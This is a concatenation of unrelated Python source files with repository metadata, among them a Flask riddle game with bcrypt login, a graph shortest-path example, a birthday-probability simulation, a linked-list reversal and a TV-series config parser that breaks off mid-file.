whole_data.append(train_label[-1])
self.train_data = train_data
self.train_label = train_label
self.whole_data = whole_data
def get_word_list_final_from_word_list_file(self):
with open('utils/data/dictionary.txt', 'rb') as f:
self.word_list_final = pickle.load(f)
return self.word_list_final
def get_voc_size(self, word_list):
self.voc_size = len(word_list)
return self.voc_size
def add_words(self):
for i in range(len(self.whole_data)):
if (i%10000) == 0:
print(i,'/',len(self.whole_data),'it is add_words function!')
for ii in range(len(self.whole_data[i])):
if(self.whole_data[i][ii] not in self.word_list):
self.word_list.append(self.whole_data[i][ii])
self.times.append(1)
else:
index = self.word_list.index(self.whole_data[i][ii])
self.times[index] += 1
if self.times[index] == 50:
self.word_list_final.append(self.whole_data[i][ii])
#print(len(self.word_list))
self.voc_size = len(self.word_list_final)
self.store_word_list()
def BuildTrainableData(self):
self.get_word_list_final_from_word_list_file()
max_len = self.max_len
data_len = len(self.train_data)# about 2.7 millions...
print('data_len',data_len)
train_x = np.zeros((data_len,max_len))
train_y = np.zeros((data_len,max_len))
for i in range(data_len):#build data
if (i%10000) == 0:
print(i,'/',data_len,'it is BuildTrainableData!')
for ii in range(max_len):
if ii < len(self.train_data[i]):#not padding
if self.train_data[i][ii] in self.word_list_final:
index = self.word_list_final.index(self.train_data[i][ii])
train_x[i][ii] = index
else:
train_x[i][ii] = 3
elif ii == len(self.train_data[i]):
train_x[i][ii] = 2
else:#padding
train_x[i][ii] = 0
for i in range(data_len):#build label
if (i%10000) == 0:
print(i,'/',data_len,'it is BuildTrainableData!')
for ii in range(max_len):
if ii < len(self.train_label[i]):#not padding
if self.train_label[i][ii] in self.word_list_final:
index = self.word_list_final.index(self.train_label[i][ii])
train_y[i][ii] = index
else:
train_y[i][ii] = 3
elif ii == len(self.train_label[i]):
train_y[i][ii] = 2
else:#padding
train_y[i][ii] = 0
self.train_x = train_x
self.train_y = train_y
self.store_train_data()
def get_data_word(self,index):
data_word = []
for i in range(self.voc_size):
if i == index:
data_word.append(1)
else:
data_word.append(0)
return data_word
def read_train_data(self):
self.get_voc_size()
with open('utils/data/train_data_x.txt', 'rb') as f:
self.train_x = pickle.load(f)
with open('utils/data/train_data_y.txt', 'rb') as f:
self.train_y = pickle.load(f)
def read_npy_train_data(self):
self.voc_size = 3004
self.train_x = np.load('utils/data/train_data.npy')
self.train_y = np.load('utils/data/train_label.npy')
self.train_y = self.train_y[:,1:]
def store_train_data(self):
with open('utils/data/train_data_x(25).txt', 'wb') as f_x:
pickle.dump(self.train_x,f_x)
with open('utils/data/train_data_y(25).txt', 'wb') as f_y:
pickle.dump(self.train_y,f_y)
def store_word_list(self):
with open('utils/data/word_list.txt', 'wb') as f:
pickle.dump(self.word_list_final,f) | UTF-8 | Python | false | false | 6,044 | py | 7 | dataManager.py | 2 | 0.519689 | 0.510258 | 0 | 152 | 38.769737 | 107 |
vikash-india/DeveloperNotes2Myself | 15,710,990,377,196 | 2a242383ab2f24fb9706a8119ac93b368ac81e5c | 992d7341b692b7e659510b261fd4ab168f4a1c13 | /languages/python/src/concepts/P085_OOP_GettersAndSetters.py | 27ae141de0fdbea8cdebe5832fb5387a9ee3afd6 | [
"MIT"
]
| permissive | https://github.com/vikash-india/DeveloperNotes2Myself | 427cd8ef98ab73ce42c4c4a74ca6f1395f508ae4 | fe277a3c52f73884863f2f72b237365b27a8c882 | refs/heads/develop | 2022-09-04T22:03:34.592580 | 2020-10-30T08:05:00 | 2020-10-30T08:05:00 | 146,297,297 | 2 | 6 | MIT | false | 2022-08-23T17:42:55 | 2018-08-27T12:54:19 | 2022-03-11T09:06:23 | 2022-08-23T17:42:52 | 46,228 | 1 | 3 | 8 | XSLT | false | false | # Description: Getters and Setters
"""
### Note
* None
"""
class Player(object):
def __init__(self, name):
self.name = name
self._lives = 3
self.level = 1
self.score = 0
def _get_lives(self):
return self._lives
def _set_lives(self, lives):
if lives >= 0:
self._lives = lives
else:
print("Lives cannot be negative")
self._lives = 0
lives = property(_get_lives, _set_lives)
def __str__(self):
return "Name: {0.name}, Lives: {0.lives}, Level: {0.level}, Score {0.score}".format(self)
if __name__ == '__main__':
dilbert = Player("Dilbert")
print(dilbert.name)
print(dilbert.lives)
dilbert.lives -= 1
print(dilbert)
dilbert.lives -= 1
print(dilbert)
dilbert.lives -= 1
print(dilbert)
dilbert.lives -= 1
print(dilbert)
| UTF-8 | Python | false | false | 891 | py | 823 | P085_OOP_GettersAndSetters.py | 302 | 0.540965 | 0.526375 | 0 | 48 | 17.5625 | 97 |
Eliory09/Riddlism | 10,058,813,425,973 | 8c9475b82d2b4f39845afa7de9e4f5cb5c9fb548 | ce32aa910d7fe6c143bfb3b3dc72fc67bf7e3d3f | /app.py | bfcf16bcb2264b0060f5bfb2d7c2840ff61aa40d | []
| no_license | https://github.com/Eliory09/Riddlism | 2eae278b3642d16091174fbcf746e8777ed55bda | 70e282c2a8f1253672611a9d2c8203917424aee0 | refs/heads/main | 2023-08-23T16:52:06.180703 | 2023-08-11T11:01:04 | 2023-08-11T11:01:04 | 319,796,544 | 0 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null | import os
import bcrypt
from dotenv import load_dotenv
from flask import (Flask, abort, flash, g, redirect, render_template, request,
session, url_for)
from flask_login import (LoginManager, current_user, login_required,
login_user, logout_user)
from peewee import fn
from playhouse.shortcuts import model_to_dict
import config
from models import Difficulty, Riddles, Users, UsersRiddles, database, db_proxy
# Initialization
load_dotenv()
SECRET_KEY = os.getenv('SECRET_KEY')
if 'HEROKU' in os.environ:
SECRET_KEY.encode('utf-8')
app = Flask(__name__)
app.secret_key = SECRET_KEY
app.config.from_object(config.DevelopmentConfig())
login_manager = LoginManager()
login_manager.init_app(app)
MINIMAL_PASS_LENGTH = 8
RIDDLES_LIMIT = 150
TOP_PLAYERS = 10
@login_manager.user_loader
def load_user(user_id):
"""User loader function."""
try:
user = Users.get(user_id)
except:
return
return user
@app.before_request
def _db_connect():
g.db = db_proxy
g.db.connect()
@app.teardown_request
def _db_close(_):
if not database.is_closed():
g.db.close()
@app.errorhandler(404)
def page_not_found(e):
return render_template('404.j2'), 404
@app.errorhandler(401)
def page_unauthorized(e):
return render_template('401.j2'), 401
# Register error handlers.
app.register_error_handler(404, page_not_found)
app.register_error_handler(401, page_unauthorized)
#App routes.
@app.route('/index')
@app.route('/')
def index():
return render_template("index.j2")
@app.route('/register', methods=["GET", "POST"])
def register():
if request.method == "POST":
user = Users.select(Users.username).where(fn.Lower(Users.username) == request.form['username'].lower())
if user:
flash('Username is already registered', "registered")
elif len(request.form['password']) < MINIMAL_PASS_LENGTH:
flash('Password must be at least 8 digits long')
else:
salt = bcrypt.gensalt(prefix=b'2b', rounds=10)
unhashed_password = request.form['password'].encode('utf-8')
hashed_password = bcrypt.hashpw(unhashed_password, salt)
fields = {
**request.form,
'password': hashed_password
}
user = Users(**fields)
user.save()
login_user(user)
return redirect(url_for('index'))
return render_template("register.j2")
@app.route('/riddles/<int:riddle_id>', methods=["GET", "POST"])
@login_required
def riddle(riddle_id):
if riddle_id >= RIDDLES_LIMIT:
abort(404)
query = UsersRiddles.select(UsersRiddles.riddle_id).where(UsersRiddles.user_id == current_user.user_id)
solved = {riddle.riddle_id for riddle in query}
for num in solved:
if num == riddle_id:
return redirect(url_for('correct', riddle_id=riddle_id))
if request.method == "POST":
riddle = Riddles.select().where(Riddles.riddle_id == riddle_id).get()
answer = riddle.answer.lower()
if answer != request.form['user_answer'].lower():
flash("Wrong answer. Try again.")
else:
UsersRiddles.create(riddle=riddle_id, user=current_user.user_id)
current_user.points += 1
current_user.save()
return redirect(url_for('correct', riddle_id=riddle_id))
riddle = Riddles.select().where(Riddles.riddle_id == riddle_id).join(Difficulty, attr='difficulty_id').get()
riddle_dict = model_to_dict(riddle)
return render_template("riddle.j2", **riddle_dict)
@app.route('/riddles/<int:riddle_id>/correct', methods=["GET", "POST"])
@login_required
def correct(riddle_id):
return render_template("correct.j2", riddle_id=riddle_id, username=current_user.name)
@app.route('/riddles')
@login_required
def riddles():
query = (Riddles
.select(Riddles.riddle_id)
.order_by(Riddles.riddle_id)
.limit(RIDDLES_LIMIT))
riddles = [riddle.riddle_id for riddle in query]
query = UsersRiddles.select(UsersRiddles.riddle_id).where(UsersRiddles.user_id == current_user.user_id)
solved = {riddle.riddle_id for riddle in query}
return render_template("riddles.j2", riddles=riddles, solved=solved)
@app.route('/login', methods=['GET', 'POST'])
def login():
if request.method == 'POST' and request.form['username']:
try:
input_username = request.form['username'].lower()
user = Users.select().where(
fn.Lower(Users.username) == input_username
).get()
except Users.DoesNotExist:
flash('No such username found. Please try again')
else:
fields = model_to_dict(user)
pw = request.form['password'].encode('utf-8')
if bcrypt.checkpw(pw, fields['password'].encode('utf-8')):
user = Users(**fields)
login_user(user)
return redirect(url_for('index'))
else:
flash('The password entered is incorrect')
return render_template('login.j2')
@app.route('/ranking')
def ranking():
top_players = (Users
.select()
.order_by(Users.points.desc())
.limit(TOP_PLAYERS))
top_players = [(i, user) for i, user in enumerate(top_players, 1)]
print(top_players)
return render_template('ranking.j2', top_players=top_players)
@app.route('/logout')
def logout():
session.pop('logged_in', None)
logout_user()
return redirect(url_for('index'))
if __name__ == '__main__':
app.run(threaded=True, port=5000)
| UTF-8 | Python | false | false | 5,667 | py | 16 | app.py | 2 | 0.625551 | 0.61567 | 0 | 186 | 29.467742 | 112 |
Cyren4/bootcamp-python | 6,459,630,818,239 | f5b1959f98f16f318d9d6adf0666539a5657d2bb | cdafd6218ff5a2f936f8507e9f289e42322309e6 | /42/boootcamp/day00/ex05/kata02.py | 06011d0d9638203809fba2bcbc258a14edc17ddc | []
| no_license | https://github.com/Cyren4/bootcamp-python | 33fee15bf67b7206315be8ad151090fd741b32ca | 7e6f3986535f7e6f47be8aa6266b39788dd18de0 | refs/heads/master | 2022-04-16T12:14:06.036133 | 2020-04-16T14:31:12 | 2020-04-16T14:31:12 | 256,238,226 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
hour, minutes, year, month, day = (3,30,2019,9,25)
print("%.2d/%.2d/%d %.2d:%d" %(day, month, year, hour, minutes))
| UTF-8 | Python | false | false | 119 | py | 18 | kata02.py | 16 | 0.579832 | 0.470588 | 0 | 3 | 38 | 64 |
ezucca/reoccuring-bday-prob-python | 4,355,096,862,709 | 5be6a6d7af7c6e9f658b62601a6ec61172edf464 | c743889d698a4be9607a83c2194e967587ee195f | /a4code.py | b028fc59be2ffde733556b149e58ced18c6126ca | []
| no_license | https://github.com/ezucca/reoccuring-bday-prob-python | 4773861cee4ab8efb730e2378839d1cbd7fcf94d | 3068ff323eac17f83d2137f15ebb56735a72a9cf | refs/heads/master | 2016-08-05T03:54:12.259470 | 2015-06-30T05:57:46 | 2015-06-30T05:57:46 | 38,290,575 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # Emily Zucca
from pylab import *
import numpy.random as npr
from math import *
import random as rand
def combinations(n, k):
prod = 1.0
for j in range(k):
prod = prod * (n-j) / (j+1)
return prod
#Real Birthdays
infile = open('birthday.txt', 'r')
bdays = []
for i in range(365):
s = infile.readline().split()
bdays.append(int(s[1]))
def plotA():
title("Birthdays (1978)")
xlabel("Bdays")
ylabel("Frequency")
ylim(0, 11000)
domain1 = array(range(1, 366)) - 0.1
vals = bdays
stem(domain1, vals, markerfmt = 'b.', label = "freq of bdays")
legend(loc = 'upper left')
show()
def valuesB():
infile = open('birthday.txt', 'r')
bdaylist = []
result = []
d = range(0, 365)
for j in range(365):
s = infile.readline().split()
bdaylist.append(int(s[1]))
for i in range(365):
n = bdaylist[i]/3333239.0
result.append(n)
r = npr.choice(d, p=result)
return r
def plotB():
d = range(0, 365)
bdaylist = []
result = [0] * 100
bdaylist2 = []
result2 = [0] * 100
for i in range(10000):
r = 0
bdaylist[:] = []
while (r < 100):
r = r + 1
b = valuesB()
if b in bdaylist:
result[r] = result[r] + 1
break
else:
bdaylist.append(b)
for j in range(10000):
r2 = 0
bdaylist2[:] = []
while (r2 < 100):
r2 = r2 + 1
b2 = plotC()
if b2 in bdaylist2:
result2[r2] = result2[r2] + 1
break
else:
bdaylist2.append(b2)
xlabel("Num of Ppl")
ylabel("Probabilities")
title("Prob of Re-Occurring Bdays")
cumulative = cumsum(result)
rlist = array(cumulative)/10000.0
ppl = range(1, 101)
plot(ppl, rlist, label = "cumulative distribution")
cumulative2 = cumsum(result2)
rlist2 = array(cumulative2)/10000.0
ppl2 = range(1,101)
plot(ppl2, rlist2, label = "uniform distribution")
show()
def plotC():
rlist = [1/365.0] * 365
d = range(0, 365)
b = npr.choice(d, p=rlist)
return b
| UTF-8 | Python | false | false | 2,283 | py | 1 | a4code.py | 1 | 0.502409 | 0.444152 | 0 | 114 | 18.605263 | 66 |
leohsmedeiros/DataScienceStudy | 1,520,418,462,724 | 32613b2e3b23cb47f8032ecd37dc0bbfbed81100 | 497bd5b174c2ea1798ea077a23e8d64a6efcdbf5 | /udemy/05 - grafos/04 - Caminhos e Distâncias/caminhos_distancias_parte_01.py | badb8908bf00b7f7dfd63ae90ddbcf7ebaf49147 | []
| no_license | https://github.com/leohsmedeiros/DataScienceStudy | 804d5a857516d5c8a64e0314c0d4886e4632fac8 | 69b9b61dbde8437d771a1dfda1ea5d3af23e78fb | refs/heads/master | 2020-04-11T10:09:17.828999 | 2019-09-13T16:26:01 | 2019-09-13T16:26:01 | 161,705,084 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
from igraph import Graph
from igraph import plot
"""
Vamos trabalhar com o cálculo dos caminhos e distâncias
"""
grafo = Graph(edges = [(0,2), (0,1), (1,4), (1,5), (2,3), (6,7), (3,7), (4,7), (5,6)], directed = True)
grafo.vs['label'] = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H']
grafo.es['weight'] = [2,1,2,1,2,1,3,1]
#edge_label vai colocar o valor dos pesos em cada aresta
plot(grafo, bbox = (300,300), edge_label = grafo.es['weight'])
#vamos calcular a menor rota entre o A -> H
#vpath indica os caminhos dos vertices
caminho_vertice = grafo.get_shortest_paths(0, 7, output = 'vpath')
#por que estamos em uma lista de array com uma única posição
for n in caminho_vertice[0]:
print(grafo.vs[n]['label'])
#epath indica os caminhos das arestas
#vai retornar o indice do peso de cada aresta percorrida, a soma dos valores nesses indices é a menor distância (custo)
caminho_aresta = grafo.get_shortest_paths(0, 7, output = 'epath')
#o retorno de caminho_aresta é uma matriz, vamos convertê-la manualmente para uma lista
caminho_aresta_id = []
for n in caminho_aresta[0]:
caminho_aresta_id.append(n)
distancia = 0
for e in grafo.es:
#se o indice do grafo estiver em caminho_aresta_id
if e.index in caminho_aresta_id:
distancia += grafo.es[e.index]['weight']
| UTF-8 | Python | false | false | 1,351 | py | 48 | caminhos_distancias_parte_01.py | 47 | 0.671386 | 0.640835 | 0 | 39 | 33.410256 | 119 |
yannabraham/PickANumber | 5,961,414,651,587 | 9d6317cedf9ad570d1e4ed59781a2439a13ec9ee | 1ff8ed674aff56d11818aa7d5138140b0c645091 | /src/PickANumber.py | da1eac7afbe51e42ade229e8671ed608baf97891 | []
| no_license | https://github.com/yannabraham/PickANumber | e1e56b5993842b306ac0060bbb881baabceef693 | 453f8d28487d8a9f6359a82125d8d80a16547b89 | refs/heads/master | 2016-09-05T19:23:16.093224 | 2015-08-24T12:22:00 | 2015-08-24T12:22:00 | 41,301,459 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | '''
Created on Feb 14, 2014
@author: abrahya1
'''
from random import randint
def pickANumber(turns=3,minNum=1,maxNum=10):
score = [0,0]
while turns>0:
secretNumber = randint(minNum, maxNum)
print 'Choisis un chiffre entre %i et %i\t' % (minNum, maxNum)
myGuess = None
while myGuess is None:
myGuess = raw_input('??')
if ( int(myGuess)<minNum ) | ( int(myGuess)>maxNum ):
myGuess = None
if int(myGuess)==secretNumber:
print 'Gagne :-)'
score[0]+=1
else:
print 'Perdu :-('
score[1]+=1
turns-=1
print 'Score final apres %i tours\n' % sum(score)
print 'Moi: %i\nVous: %i' % (score[1],score[0])
return(None)
if __name__ == '__main__':
pickANumber(5,1,10) | UTF-8 | Python | false | false | 821 | py | 2 | PickANumber.py | 2 | 0.53106 | 0.500609 | 0 | 31 | 25.516129 | 70 |
pretenders/pretenders | 14,800,457,309,344 | 52ae35062991edc9ac0829a6d4260477dc1fe7c6 | c4a6a4d2c27ce50b568ef216f3064a5a6dba99ee | /pretenders/client/__init__.py | 5f577ca924c2ee39b2a0620bef6dbb06257c1cfa | [
"MIT"
]
| permissive | https://github.com/pretenders/pretenders | 1a9aba9aca61e2c6601ff3ce17cff2fbd397002f | d76f5ce3504c64bc1c583f912c8ef1f7ebbe1ee2 | refs/heads/develop | 2022-08-03T10:19:25.980148 | 2022-07-10T22:02:58 | 2022-07-10T22:02:58 | 4,322,486 | 87 | 30 | MIT | false | 2022-07-10T22:02:59 | 2012-05-14T10:19:45 | 2022-06-24T09:47:32 | 2022-07-10T22:02:58 | 1,064 | 108 | 22 | 30 | Python | false | false | import json
import logging
try:
from http import client as httplib
except ImportError:
# Python 2.6/2.7
import httplib
import urllib
from pretenders.common.exceptions import (
ConfigurationError,
ResourceNotFound,
UnexpectedResponseStatus,
)
from pretenders.common.pretender import PretenderModel
from pretenders.common.http import binary_to_ascii, Preset
LOGGER = logging.getLogger("pretenders.client")
class APIHelper(object):
def __init__(self, connection, path):
self.connection = connection
self.path = path
def _get_response(self, method, *args, **kwargs):
self.connection.request(method=method, *args, **kwargs)
return self.connection.getresponse()
def http(self, method, *args, **kwargs):
"""
Issue an HTTP request.
The HTTP connection is reused between requests. We try to detect
dropped connections, and in those cases try to reconnect to the remote
server.
"""
try:
response = self._get_response(method, *args, **kwargs)
except (httplib.CannotSendRequest, httplib.BadStatusLine):
self.connection.close()
self.connection.connect()
response = self._get_response(method, *args, **kwargs)
return response, response.read()
def get(self, id):
return self.http("GET", url="{0}/{1}".format(self.path, id))
def list(self, filters={}):
query_string = ""
if filters:
query_string = "?{0}".format(urllib.urlencode(filters))
url = "{0}{1}".format(self.path, query_string)
return self.http("GET", url=url)
def reset(self):
return self.http("DELETE", url=self.path)
class PresetHelper(APIHelper):
def add(
self,
match_rule=None,
response_status=200,
response_body=b"",
response_headers={},
times=1,
after=0,
):
"""
Add a new preset to the boss server.
"""
new_preset = Preset(
headers=response_headers,
body=binary_to_ascii(response_body),
status=response_status,
rule=match_rule,
times=times,
after=after,
)
response, data = self.http("POST", url=self.path, body=new_preset.as_json())
if response.status != 200:
raise ConfigurationError(data.decode())
return response
class BossClient(object):
boss_mock_type = None
def __init__(self, host, port, timeout=None, name=None):
self.host = host
self.port = port
self.timeout = timeout
self.name = name
self.full_host = "{0}:{1}".format(self.host, self.port)
self.connection = httplib.HTTPConnection(self.full_host)
self.boss_access = APIHelper(self.connection, "")
LOGGER.info(
"Requesting {0} pretender. Port:{1} Timeout:{2} ({3})".format(
self.boss_mock_type, self.port, self.timeout, self.name
)
)
if self.boss_mock_type:
self.pretender_details = self._request_mock_access()
else:
self.pretender_details = {}
self.history = APIHelper(
self.connection, "/history/{0}".format(self.pretend_access_point_id)
)
self.preset = PresetHelper(
self.connection, "/preset/{0}".format(self.pretend_access_point_id)
)
def reset(self):
"""
Delete all history.
"""
self.history.reset()
self.preset.reset()
return self
@property
def create_mock_url(self):
return "/{0}".format(self.boss_mock_type)
@property
def pretend_access_point_id(self):
return self.pretender_details.get("id", "")
@property
def pretend_access_point(self):
return self.full_host
def _request_mock_access(self):
"""
Ask the boss to create a mock server by POSTing to ``create_mock_url``
:returns:
A tuple containing:
position 0: hostname[:port] of the mock server
position 1: unique id of the pretender (for teardown
purposes)
"""
post_body = {"name": self.name}
if self.timeout:
post_body["pretender_timeout"] = self.timeout
post_body = json.dumps(post_body)
response, data = self.boss_access.http(
"POST", url=self.create_mock_url, body=post_body
)
pretender_json = data.decode("ascii")
pretender_details = json.loads(pretender_json)
return pretender_details
@property
def delete_mock_url(self):
return "{0}/{1}".format(self.create_mock_url, self.pretend_access_point_id)
def delete_mock(self):
"Delete the mock server that this points to."
response, data = self.boss_access.http(
method="DELETE", url=self.delete_mock_url
)
if not response.status == 200:
raise Exception("Delete failed")
def get_pretender(self):
"Get pretenders from the server in dict format"
response, data = self.boss_access.http(
method="GET",
url="/{0}/{1}".format(self.boss_mock_type, self.pretend_access_point_id),
)
if response.status == 200:
return PretenderModel.from_json_response(data)
elif response.status == 404:
raise ResourceNotFound("The mock server for this client was shutdown.")
else:
raise UnexpectedResponseStatus(response.status)
| UTF-8 | Python | false | false | 5,630 | py | 66 | __init__.py | 48 | 0.587034 | 0.579751 | 0 | 190 | 28.631579 | 85 |
mansonul/events | 6,906,307,414,289 | 6951d356195e9916d0b2a60c12e0c4299669b83d | a03eba726a432d8ef133f2dc55894ba85cdc4a08 | /events/contrib/plugins/form_elements/content/content_image_url/base.py | 0ff2a1ce5632a97fada8892c315fffaf50b87da0 | [
"MIT"
]
| permissive | https://github.com/mansonul/events | 2546c9cfe076eb59fbfdb7b4ec8bcd708817d59b | 4f6ca37bc600dcba3f74400d299826882d53b7d2 | refs/heads/master | 2021-01-15T08:53:22.442929 | 2018-01-30T16:14:20 | 2018-01-30T16:14:20 | 99,572,230 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from __future__ import absolute_import
from collections import OrderedDict
from uuid import uuid4
from django.template.loader import render_to_string
from django.utils.translation import ugettext_lazy as _
from nonefield.fields import NoneField
from fobi.base import FormElementPlugin
from . import UID
from .forms import ContentImageURLForm
from .settings import (
FIT_METHOD_FIT_WIDTH,
FIT_METHOD_FIT_HEIGHT,
)
__title__ = 'fobi.contrib.plugins.form_elements.content.content_image_url.base'
__author__ = 'Artur Barseghyan <artur.barseghyan@gmail.com>'
__copyright__ = '2014-2017 Artur Barseghyan'
__license__ = 'GPL 2.0/LGPL 2.1'
__all__ = ('ContentImageURLPlugin',)
class ContentImageURLPlugin(FormElementPlugin):
"""Content image plugin."""
uid = UID
name = _("Content image URL")
group = _("Content")
form = ContentImageURLForm
def post_processor(self):
"""Post process data.
Always the same.
"""
self.data.name = "{0}_{1}".format(self.uid, uuid4())
def get_raw_data(self):
"""Get raw data.
Might be used in integration plugins.
"""
return OrderedDict(
(
('url', self.data.url),
('alt', self.data.alt),
('fit_method', self.data.fit_method),
('size', self.data.size),
)
)
def get_rendered_image(self):
"""Get rendered image."""
width, height = self.data.size.split('x')
if FIT_METHOD_FIT_WIDTH == self.data.fit_method:
thumb_size = (width, 0)
elif FIT_METHOD_FIT_HEIGHT == self.data.fit_method:
thumb_size = (0, height)
else:
thumb_size = (width, height)
context = {
'plugin': self,
'thumb_size': thumb_size,
}
rendered_image = render_to_string(
'content_image_url/render.html',
context
)
return rendered_image
def get_form_field_instances(self, request=None, form_entry=None,
form_element_entries=None, **kwargs):
"""Get form field instances."""
field_kwargs = {
'initial': self.get_rendered_image(),
'required': False,
'label': '',
}
return [(self.data.name, NoneField, field_kwargs)]
| UTF-8 | Python | false | false | 2,378 | py | 144 | base.py | 109 | 0.576535 | 0.568966 | 0 | 86 | 26.651163 | 79 |
dipeshjoshi/MachineLearning | 4,664,334,484,263 | 85bbd8a0ab0f94b42f4ef73f16581bd2ae1e62a3 | c71248c1e83714a457daf0490c8db42b6697717f | /python/algoInPython/linkedList/reversingLinkedList.py | 8a666bbe7f086558133823f4616dbbd6aaa77846 | []
| no_license | https://github.com/dipeshjoshi/MachineLearning | c3841f928e45fe142f1bfc6bfe29c8a8f5118d60 | 2231bb7dea4f416558f0a862430d6f15f12deaf9 | refs/heads/master | 2021-05-06T10:42:55.029053 | 2019-03-15T09:35:03 | 2019-03-15T09:35:03 | 114,160,960 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import singly_linked_list as sll
class ReverseLinkedList:
def reverseIterative(self, linkedList):
if linkedList.head is not None:
ptr1 = linkedList.head;
ptr2 = ptr1.next;
while ptr2 is not None:
if(ptr1 == linkedList.head):
ptr1.next = None
temp = ptr2.next
ptr2.next = ptr1
ptr1 = ptr2
ptr2 = temp
linkedList.head = ptr1
def reverse(self):
if __name__=='__main__':
inputList = [9,2,3,4]
lList = sll.SinglyLinkedList()
for item in inputList:
lList.addElement(item)
lList.printLinkedList()
rev = ReverseLinkedList()
#rev.reverseIterative(lList)
#lList.printLinkedList()
rev.recursiveReverse(lList.head)
| UTF-8 | Python | false | false | 822 | py | 92 | reversingLinkedList.py | 84 | 0.553528 | 0.532847 | 0 | 40 | 19.55 | 44 |
tahandy/numerical | 12,627,203,880,509 | db217ebcca3b941b0f39ba8bcc914df3cd55ca83 | e568b63b013ff810eb279362e3ceab70169ff3ed | /grid/uniform/python/gridUniform.py | a6cd997f8239f29ca85f76585b35a3f9e4dc863a | [
"MIT"
]
| permissive | https://github.com/tahandy/numerical | 23a4e14b9186819d22b9f9d39b81c37593e886e7 | e8790f05ee323c7a8104e3becc8fd1a4d25023eb | refs/heads/master | 2021-01-10T19:03:17.022310 | 2015-10-30T04:16:55 | 2015-10-30T04:16:55 | 40,026,745 | 3 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | '''
The MIT License (MIT)
Copyright (c) 2015 Timothy A. Handy
This module is intended to serve as a simple uniform numerical
grid implementation in Python 2.7.10. It is intended to support
cell, face, and edge centered variables in up to 3 dimensions.
Data is managed via the numpy library (www.numpy.org).
'''
from gridUniformConstants import *
import numpy as np
import collections
class gridUniform:
NDIM = -1
NUNKVAR = 0
NFACEVAR = 0
NEDGEVAR = 0
unkMap = dict()
faceMap = dict()
edgeMap = dict()
extents = np.zeros([MDIM,HIGH])
def parseVariables(self,confFile):
varIdentifier = 'VARIABLE'
varSuffix = '_VAR'
[self.NUNKVAR, self.unkMap] = parseVariableType(confFile, varIdentifier, varSuffix)
varIdentifier = 'FACEVAR'
varSuffix = '_FACE'
[self.NFACEVAR, self.faceMap] = parseVariableType(confFile, varIdentifier, varSuffix)
varIdentifier = 'EDGEVAR'
varSuffix = '_EDGE'
[self.NEDGEVAR, self.edgeMap] = parseVariableType(confFile, varIdentifier, varSuffix)
print self.NUNKVAR
print self.unkMap
print self.NFACEVAR
print self.faceMap
print self.NEDGEVAR
print self.edgeMap
def __init__(self):
print "Hello world!"
self.parseVariables('variable_config.par')
print self.extents
def parseVariableType(confFile, ident, suff):
SZ = 0
varList = []
for line in open(confFile):
lineNew = line.upper()
if ident in lineNew:
tmp = lineNew.split(None)
varList = varList + [tmp[1].replace(' ','')]
varList.sort()
varList = set(varList)
# Construct the {var}_{suff} map to integer indices
varMap = dict()
for v in varList:
SZ += 1
varMap['%s%s'%(v[:4].replace(' ',''),suff)] = SZ-1
# Add the {var}_{suff} variable as a global constant
for v in varMap:
globals()[v] = varMap[v]
return [SZ,varMap]
if __name__ == "__main__":
grid = gridUniform()
| UTF-8 | Python | false | false | 2,070 | py | 30 | gridUniform.py | 7 | 0.615459 | 0.606763 | 0 | 81 | 24.469136 | 93 |
szpaczyna/cherry_conf | 5,446,018,577,128 | e5a0bc6c148714f90ba327814586dc28bc1b0f9d | 7ce114b97cbe0410dfa338f757115b93e7e5a990 | /scripts/tvs/config.py | 27ed71efab090343d51fb7576056ef32aaaea535 | []
| no_license | https://github.com/szpaczyna/cherry_conf | 23327fa2ff75fdee25dc946f3cc698c3c754e291 | 52f2108873a6323b2b8d997a1f5d79a1ecb8f313 | refs/heads/master | 2021-01-15T15:43:53.838450 | 2016-10-04T17:35:17 | 2016-10-04T17:35:17 | 36,720,615 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/env python
#-*- coding: utf8 -*-
# Copyright 2009-2012 Kamil Winczek <kwinczek@gmail.com>
#
# This file is part of series.py.
#
# series.py is free software: you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free
# Software Foundation, either version 3 of the License, or (at your option)
# any later version.
#
# series.py is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
# for more details.
#
# You should have received a copy of the GNU General Public License along
# with series.py. If not, see http://www.gnu.org/licenses/.
import datetime
import os
import re
import shelve
import sys
from optparse import OptionParser, OptionGroup
# --------------------------------------------------------------------- #
# #
# Configuration #
# #
# --------------------------------------------------------------------- #
DEFAULT_CONFIG_DIR = os.path.join(os.getenv('HOME'), '.tvseries')
DEFAULT_CONFIG_FILE = os.path.join(DEFAULT_CONFIG_DIR, 'config')
DEFAULT_CACHE_FILE = os.path.join(DEFAULT_CONFIG_DIR, '.cache')
DEFAULT_CACHE_IDS = os.path.join(DEFAULT_CONFIG_DIR, '.ids')
def opt_parse():
"""Define cmd line options"""
usage = "TVRage.com parser by crs (http://winczek.com/tvseries/)\nusage: %prog [options] [title ...]"
parser = OptionParser(usage, version="%prog 0.6.6" )
group_a = OptionGroup(parser, "Actions")
group_p = OptionGroup(parser, "Program control")
group_f = OptionGroup(parser, "Files locations")
group_a.add_option("-w", "--when", dest="when",
help="Print series for given day only. Values: yesterday, today, tommorow or date in format: YYYY-DD-MM.")
group_a.add_option("-s", "--season", dest="season", action="store", default=None,
help="Print given season only. Values: <int>, '0' for current one; 'all' for all seasons.")
group_a.add_option("-e", "--episode", dest="episode", action="store",
help="Print given episode only. To be used with --season only. Values: <int>.")
group_f.add_option("-f", "--config-file", dest="configfile",
default=DEFAULT_CONFIG_FILE,
help="Read config from CONFIGFILE.")
group_f.add_option("-c", "--cache-file", dest="cachefile",
default=DEFAULT_CACHE_FILE,
help="Read cache from CACHEFILE.")
group_f.add_option("-i", "--cache-ids", dest="cacheids",
